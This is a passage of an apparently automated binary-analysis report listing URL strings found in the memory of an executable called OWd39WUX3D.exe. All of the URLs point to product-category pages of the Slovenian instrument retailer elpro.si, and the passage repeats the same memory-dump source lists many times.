00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/digitalni-termometri/i
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/digitalni-termometri/o
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/digitalni-termometri/p
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/digitalni-termometri/t
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/kalibracija/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/kalibracija/kalibracija-temperature/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/kalibracija/kalibracija-tlaka/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/dodatni-izdelki-in-dodatki-za-nivo/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/nivojska-stikala-wika/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/pretvorniki-nivoja/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/prikazovalniki-nivoja/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/sila/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/dodatni-izdelki-in-dodatki-za-tempe
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/pretvorniki-temperature/
